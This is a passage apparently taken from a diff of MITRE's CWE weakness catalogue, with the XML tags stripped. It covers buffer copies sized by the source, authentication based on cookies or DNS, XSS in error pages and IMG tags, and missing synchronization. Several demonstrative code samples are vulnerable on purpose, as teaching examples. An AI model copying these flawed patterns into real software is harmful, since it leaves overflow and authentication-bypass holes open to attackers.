sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below. + + ... + // copy filename to buffer + strncpy(buf, filename, sizeof(buf)-1);... + + + + + + CVE-2011-1959 + Chain: large length value causes buffer over-read (CWE-126) + https://www.cve.org/CVERecord?id=CVE-2011-1959 + + + CVE-2011-1848 + Use of packet length field to make a calculation, then copy into a fixed-size buffer + https://www.cve.org/CVERecord?id=CVE-2011-1848 + + + CVE-2011-0105 + Chain: retrieval of length value from an uninitialized memory location + https://www.cve.org/CVERecord?id=CVE-2011-0105 + + + CVE-2011-0606 + Crafted length value in document reader leads to buffer overflow + https://www.cve.org/CVERecord?id=CVE-2011-0606 + + + CVE-2011-0651 + SSL server overflow when the sum of multiple length fields exceeds a given value + https://www.cve.org/CVERecord?id=CVE-2011-0651 + + + CVE-2010-4156 + Language interpreter API function doesn't validate length argument, leading to information exposure + https://www.cve.org/CVERecord?id=CVE-2010-4156 + + + + Memory + + + + ARR38-C + Guarantee that library functions do not form invalid pointers + Imprecise + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-01-15 + 1.8 + 2010-02-16 + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses the size of a source buffer when reading from or writing to a destination buffer, which may cause it to access memory that is outside of the bounds of the buffer. + When the size of the destination is smaller than the size of the source, a buffer overflow could occur. + + + + + + Resultant + + + Primary + + + + + + + + + Implementation + + + + + Availability + Modify Memory + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. + + + Integrity + Confidentiality + Availability + Read Memory + Modify Memory + Execute Unauthorized Code or Commands + Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. + + + Access Control + Bypass Protection Mechanism + When the consequence is arbitrary code execution, this can often be used to subvert any other security service. + + + + + Architecture and Design + Use an abstraction library to abstract away risky APIs. Examples include the Safe C String Library (SafeStr) by Viega, and the Strsafe.h library from Microsoft. This is not a complete solution, since many buffer overflows are not related to strings. + + + Operation + Build and Compilation + Environment Hardening + + Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking. + D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail. + + + Defense in Depth + + This is not necessarily a complete solution, since these mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application. + + + + + Implementation + Programmers should adhere to the following rules when allocating and managing their applications memory: Double check that your buffer is as large as you specify. When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. Check buffer boundaries if calling this function in a loop and make sure there is no danger of writing past the allocated space. Truncate all input strings to a reasonable length before passing them to the copy and concatenation functions + + + Operation + Build and Compilation + Environment Hardening + + Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. + Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. + For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. + + Defense in Depth + These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333] + + + Operation + Environment Hardening + + Use a CPU and operating system that offers Data Execution Protection (using hardware NX or XD bits) or the equivalent techniques that simulate this feature in software, such as PaX [REF-60] [REF-61]. These techniques ensure that any instruction executed is exclusively at a memory address that is part of the code segment. + For more information on these techniques see D3-PSEP (Process Segment Execution Prevention) from D3FEND [REF-1336]. + + Defense in Depth + This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. + + + + Build and Compilation + Operation + Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution. + + + + + In the following example, the source character string is copied to the dest character string using the method strncpy. + + ...char source[21] = "the character string";char dest[12];strncpy(dest, source, sizeof(source)-1);... + + However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below. + + ...char source[21] = "the character string";char dest[12];strncpy(dest, source, sizeof(dest)-1);... + + + + In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file. + + #define LOG_INPUT_SIZE 40 + + // saves the file name to a log file + int outputFilenameToLog(char *filename, int length) { + int success; + + // buffer with size set to maximum size for input to log file + char buf[LOG_INPUT_SIZE]; + + // copy filename to buffer + strncpy(buf, filename, length); + + // save to log file + success = saveToLogFile(buf); + return success; + } + + However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below. + + ... + // copy filename to buffer + strncpy(buf, filename, sizeof(buf)-1);... + + + + + Memory + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-01-15 + 1.8 + 2010-02-16 + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences + + + CWE Content Team + MITRE + 2021-07-20 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism. + + Developers may assume that inputs such as cookies, environment variables, and hidden form fields cannot be modified. However, an attacker could change these inputs using customized clients or other attacks. This change might not be detected. When security decisions such as authentication and authorization are made based on the values of these inputs, attackers can bypass the security of the software. + Without sufficient encryption, integrity checking, or other mechanism, any input that originates from an outsider cannot be trusted. + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + High + + + Confidentiality + Access Control + Availability + Other + Bypass Protection Mechanism + Gain Privileges or Assume Identity + Varies by Context + Attackers can bypass the security decision to access whatever is being protected. The consequences will depend on the associated functionality, but they can range from granting additional privileges to untrusted users to bypassing important security checks. Ultimately, this weakness may lead to exposure or modification of sensitive data, system crash, or execution of arbitrary code. + + + + + Manual Static Analysis + Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints. + High + The effectiveness and speed of manual analysis will be reduced if the there is not a centralized security mechanism, and the security logic is widely distributed throughout the software. + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Attack Modeling + + + + High + + + + + Architecture and Design + Attack Surface Reduction + + Store state information and sensitive data on the server side only. + Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions. + If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328). + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + With a stateless protocol such as HTTP, use a framework that maintains the state for you. + Examples include ASP.NET View State [REF-756] and the OWASP ESAPI Session Management feature [REF-45]. + Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security. + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Operation + Implementation + Environment Hardening + When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. + + + Architecture and Design + Implementation + Attack Surface Reduction + + Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. + Identify all inputs that are used for security decisions and determine if you can modify the design so that you do not have to rely on submitted inputs at all. For example, you may be able to keep critical information about the user's session on the server side instead of recording it within external data. + + + + + + The following code excerpt reads a value from a browser cookie to determine the role of the user. + + Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("role")) {userRole = c.getValue();}} + + + + The following code could be for a medical records application. It performs authentication by checking if a cookie has been set. + + $auth = $_COOKIES['authenticated'];if (! $auth) {if (AuthenticateUser($_POST['user'], $_POST['password']) == "success") {// save the cookie to send out in future responsessetcookie("authenticated", "1", time()+60*60*2);}else {ShowLoginScreen();die("\n");}}DisplayMedicalHistory($_POST['patient_ID']); + + The programmer expects that the AuthenticateUser() check will always be applied, and the "authenticated" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. + However, the attacker can set the "authenticated" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication. + + + In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data. + + Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("authenticated") && Boolean.TRUE.equals(c.getValue())) {authenticated = true;}} + + + + The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status. + + struct hostent *hp;struct in_addr myaddr;char* tHost = "trustme.example.com";myaddr.s_addr=inet_addr(ip_addr_string); + hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET);if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) {trusted = true;} else {trusted = false;} + + + String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith("trustme.com")) {trusted = true;} + + + IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith("trustme.com")) {trusted = true;} + + IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. + + + + + CVE-2009-1549 + Attacker can bypass authentication by setting a cookie to a specific value. + https://www.cve.org/CVERecord?id=CVE-2009-1549 + + + CVE-2009-1619 + Attacker can bypass authentication and gain admin privileges by setting an "admin" cookie to 1. + https://www.cve.org/CVERecord?id=CVE-2009-1619 + + + CVE-2009-0864 + Content management system allows admin privileges by setting a "login" cookie to "OK." + https://www.cve.org/CVERecord?id=CVE-2009-0864 + + + CVE-2008-5784 + e-dating application allows admin privileges by setting the admin cookie to 1. + https://www.cve.org/CVERecord?id=CVE-2008-5784 + + + CVE-2008-6291 + Web-based email list manager allows attackers to gain admin privileges by setting a login cookie to "admin." + https://www.cve.org/CVERecord?id=CVE-2008-6291 + + + + + SEC09-J + Do not base security checks on untrusted sources + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-01-18 + 1.8 + 2010-02-16 + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters that could be interpreted as web-scripting elements when they are sent to an error page. + + Error pages may include customized 403 Forbidden or 404 Not Found pages. + When an attacker can trigger an error that contains script syntax within the attacker's input, then cross-site scripting attacks may be possible. + + + + + + + + + Resultant + + + + + + + + Implementation + + + Operation + + + + + Confidentiality + Integrity + Availability + Read Application Data + Execute Unauthorized Code or Commands + + + + + Implementation + Do not write user-controlled input to error pages. + + + Implementation + Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. + + + Implementation + Output Encoding + + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. + + + + Implementation + With Struts, write all data from form beans with the bean's filter attribute set to true. + + + Implementation + Attack Surface Reduction + To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. + Defense in Depth + + + + + CVE-2002-0840 + XSS in default error page from Host: header. + https://www.cve.org/CVERecord?id=CVE-2002-0840 + + + CVE-2002-1053 + XSS in error message. + https://www.cve.org/CVERecord?id=CVE-2002-1053 + + + CVE-2002-1700 + XSS in error page from targeted parameter. + https://www.cve.org/CVERecord?id=CVE-2002-1700 + + + + + XSS in error pages + + + SFP24 + Tainted input to command + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + XSS in Error Pages + Failure to Sanitize Directives in an Error Message Web Page + Improper Sanitization of Script in an Error Message Web Page + + + + The web application does not neutralize or incorrectly neutralizes scripting elements within attributes of HTML IMG tags, such as the src attribute. + Attackers can embed XSS exploits into the values for IMG attributes (e.g. SRC) that is streamed and then executed in a victim's browser. Note that when the page is loaded into a user's browsers, the exploit will automatically execute. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Read Application Data + Execute Unauthorized Code or Commands + + + + + Implementation + Output Encoding + + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. + + + + Implementation + Attack Surface Reduction + To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. + Defense in Depth + + + + + CVE-2006-3211 + Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag. + https://www.cve.org/CVERecord?id=CVE-2006-3211 + + + CVE-2002-1649 + javascript URI scheme in IMG tag. + https://www.cve.org/CVERecord?id=CVE-2002-1649 + + + CVE-2002-1803 + javascript URI scheme in IMG tag. + https://www.cve.org/CVERecord?id=CVE-2002-1803 + + + CVE-2002-1804 + javascript URI scheme in IMG tag. + https://www.cve.org/CVERecord?id=CVE-2002-1804 + + + CVE-2002-1805 + javascript URI scheme in IMG tag. + https://www.cve.org/CVERecord?id=CVE-2002-1805 + + + CVE-2002-1806 + javascript URI scheme in IMG tag. + https://www.cve.org/CVERecord?id=CVE-2002-1806 + + + CVE-2002-1807 + javascript URI scheme in IMG tag. + https://www.cve.org/CVERecord?id=CVE-2002-1807 + + + CVE-2002-1808 + javascript URI scheme in IMG tag. + https://www.cve.org/CVERecord?id=CVE-2002-1808 + + + + + Script in IMG tags + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Script in IMG Tags + Failure to Sanitize Script in Attributes of IMG Tags in a Web Page + Improper Sanitization of Script in Attributes of IMG Tags in a Web Page + + + + The product utilizes a shared resource in a concurrent manner but does not attempt to synchronize access to the resource. + If access to a shared resource is not synchronized, then the resource may not be in a state that is expected by the product. This might lead to unexpected or insecure behaviors, especially if an attacker can influence the shared resource. + + + + + + + + Integrity + Confidentiality + Other + Modify Application Data + Read Application Data + Alter Execution Logic + + + + + The following code intends to fork a process, then have both the parent and child processes print a single line. + + static void print (char * string) { + char * word;int counter;for (word = string; counter = *word++; ) { + putc(counter, stdout);fflush(stdout); + /* Make timing window a little larger... */ + + sleep(1); + } + } + int main(void) { + pid_t pid; + pid = fork();if (pid == -1) {exit(-2);}else if (pid == 0) {print("child\n");}else {print("PARENT\n");}exit(0); + } + + One might expect the code to print out something like: + + + PARENT + child + + + However, because the parent and child are executing concurrently, and stdout is flushed each time a character is printed, the output might be mixed together, such as: + + + PcAhRiElNdT + [blank line] + [blank line] + + + + + + + LCK05-J + Synchronize access to static fields that can be modified by untrusted code + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships. + + + + CWE Content Team + MITRE + 2010-08-06 + 1.10 + 2010-09-27 + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-09-23 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product utilizes a shared resource in a concurrent manner, but it does not correctly synchronize access to the resource. + If access to a shared resource is not correctly synchronized, then the resource may not be in a state that is expected by the product. This might lead to unexpected or insecure behaviors, especially if an attacker can influence the shared resource. + + + + + + + + Integrity + Confidentiality + Other + Modify Application Data + Read Application Data + Alter Execution Logic + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level 